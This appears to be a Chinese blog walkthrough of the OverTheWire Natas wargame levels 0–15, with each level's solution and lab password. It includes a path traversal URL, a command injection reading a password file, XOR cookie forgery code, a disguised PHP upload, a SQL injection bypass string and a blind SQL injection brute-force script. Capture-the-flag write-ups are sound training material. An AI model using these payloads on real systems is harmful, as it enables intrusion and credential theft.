Wargame – Natas 0-15通关攻略

由 Atom_Kid · 一月 15, 2019

Level 0

URL: http://natas0.natas.labs.overthewire.org

Username/password: natas0/natas0

查看注释

Level 1

Level 2

根据路径来到files目录

查看user.txt

Level 3

Google都找不到，说明针对爬虫做了设置，查看robots.txt文件

查看该路径，有个users.txt

natas4:Z9tkRkWmpt9Qr7XrR5jWRkgOU901swEZ

Level 4

将Referer修改为指定链接

Access granted. The password for natas5 is iX6IOfmpN7AYOQGPwtn3fXpbaJVJcHfq

Level 5

将loggedin修改为1

Access granted. The password for natas6 is aGoY4q2Dc6MgDq4oL4YtoKtyAg9PeHa1

Level 6

根据include路径访问secret.inc文件

Access granted. The password for natas7 is 7z3hEENjQtflzgnT29q7wAvMNfZdh0i9

Level 7

路径包含漏洞

http://natas7.natas.labs.overthewire.org/index.php?page=../../../../etc/natas_webpass/natas8

DBfUBfqQG69KvJvJ1iAbMoIpwSNQ9bWe

Level 8

反向计算secret

hex2bin(3d3d516343746d4d6d6c315669563362) = “==QcCtmMml1ViV3b”

Strrev(==QcCtmMml1ViV3b) = “b3ViV1lmMmtCcQ==”

Base64_decode(b3ViV1lmMmtCcQ==) = “oubWYf2kBq”

Access granted. The password for natas9 is W0mMhUcRRnG8dcghE4qvk3JA9lGt8nDl

Level 9

Passthru执行外部指令，拼接命令执行漏洞

直接查看natas10密码 ; cat /etc/natas_webpass/natas10

nOpp1igQAkUzaI1GUUjzn1bFVj7xCNzu

Level 10

过滤了一些字符，使用.* cat 命令查看

U82q5TCMMQ9xuFoI3dYX61s7OZD9JKoK

Level 11

根据PHP和JS代码

$defaultdata = array( "showpassword"=>"no", "bgcolor"=>"#ffffff");

function xor_encrypt($in) {
    $key = '<censored>';
    $text = $in;
    $outText = '';

    // Iterate through each character
    for($i=0;$i<strlen($text);$i++) {
    $outText .= $text[$i] ^ $key[$i % strlen($key)];
    }

    return $outText;
}

function loadData($def) {
    global $_COOKIE;
    $mydata = $def;
    if(array_key_exists("data", $_COOKIE)) {
    $tempdata = json_decode(xor_encrypt(base64_decode($_COOKIE["data"])), true);
    if(is_array($tempdata) &amp;&amp; array_key_exists("showpassword", $tempdata) &amp;&amp; array_key_exists("bgcolor", $tempdata)) {
        if (preg_match('/^#(?:[a-f\d]{6})$/i', $tempdata['bgcolor'])) {
        $mydata['showpassword'] = $tempdata['showpassword'];
        $mydata['bgcolor'] = $tempdata['bgcolor'];
        }
    }
    }
    return $mydata;
}
function saveData($d) {
    setcookie("data", base64_encode(xor_encrypt(json_encode($d))));
}

$data = loadData($defaultdata);

if(array_key_exists("bgcolor",$_REQUEST)) {
    if (preg_match('/^#(?:[a-f\d]{6})$/i', $_REQUEST['bgcolor'])) {
        $data['bgcolor'] = $_REQUEST['bgcolor'];
    }
}

saveData($data);
?>
<h1>natas11</h1>
<div id="content">
<body style="background: <?=$data['bgcolor']?>;">
Cookies are protected with XOR encryption<br/><br/>

<?
if($data["showpassword"] == "yes") {
    print "The password for natas12 is <censored><br>";
}
?>

需要找到值key，并且showpassword=yes

已经给出的data值为 showpassword=no & bgcolor=>#ffffff

Data值位于cookie中，此时cookie值为

ClVLIh4ASCsCBE8lAxMacFMZV2hdVVotEhhUJQNVAmhSEV4sFxFeaAw=

根据逆向此算法，求出key值

<?php
$origData = base64_decode(
    "ClVLIh4ASCsCBE8lAxMacFMZV2hdVVotEhhUJQNVAmhSEV4sFxFeaAw=");
$key = '{"showpassword":"no","bgcolor":"#ffffff"}';
$outText = "";
for ($i = 0; $i < strlen(origData); $i++) {
    $outText .= $origData[$i] ^ $key[$i % strlen($key)];
}
echo $outText;
?>

运行后得到qw8Jqw8J，则key = qw8J

则据此计算showpassword=yes时的cookie值

写出算法

<?php
function xor_encrypt($in) {
    $key = 'qw8J';
    $text = $in;
    $outText = '';

    // Iterate through each character
    for($i=0;$i<strlen($text);$i++) {
    $outText .= $text[$i] ^ $key[$i % strlen($key)];
    }

    return $outText;
}
echo base64_encode(xor_encrypt('{"showpassword":"yes","bgcolor":"#ffffff"}'));
?>

运行得到

ClVLIh4ASCsCBE8lAxMacFMOXTlTWxooFhRXJh4FGnBTVF4sFxFeLFMK

浏览器console设置cookie值

EDXp0pS26wLKHZy1rDBPUZk0RKfLGIR3

Level 12

上传一个php文件，抓包，将jpg后缀修改为php

点击php链接，执行php代码获取密码

jmLTY0qiPZBbaKc9341cqPQZBJv7MQbY

Level 13

修改文件后缀不好用了

Winhex打开制作图片马，写入jpg文件头FFD8FFE0

抓包修改后缀为php，上传成功可以访问php路径

Lg96M10TdfaPyVBkJdjymbllQ5L6qdl1

Level 14

$query = "SELECT * from users where username=\"".$_REQUEST["username"]."\" and password=\"".$_REQUEST["password"]."\"";

使用万能密码注入就可以 “ or “1”=”1

AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J

Level 15

存在sql的Boolean型盲注，利用搜索型注入like binary进行盲注爆破

import requests
import string

url = "http://natas15:AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J@natas15.natas.labs.overthewire.org/"
characters = ''.join([string.ascii_letters, string.digits])
existsStr = 'This user exists.'
strs = ''

for i in characters:
    r = requests.get(url+'?username=natas16" AND password LIKE BINARY "%'+i+'%" "')
    if existsStr in r.content:
        strs += i
        print strs

#strs  = 'acehijmnpqtwBEHINORW03569'
password = ''
for i in range(32):
    for c in strs:
        r = requests.get(url + '?username=natas16" AND password LIKE BINARY "' +password+ c + '%" "')
        if existsStr in r.content:
            password += c
            print "Password: ",password
            break

直接用sqlmap进行boolean型盲注也可以得到natas16的密码

一	二	三	四	五	六	日
« 1月
				1	2	3
4	5	6	7	8	9	10
11	12	13	14	15	16	17
18	19	20	21	22	23	24
25	26	27	28

Wargame – Natas 0-15通关攻略

您可能还喜欢...

近期文章

分类目录

Wargame – Natas 0-15通关攻略

您可能还喜欢...

西普学院（实验吧）Web题解

i春秋黑客Game之戏说春秋攻略

黑客丛林之旅通关攻略

近期文章

分类目录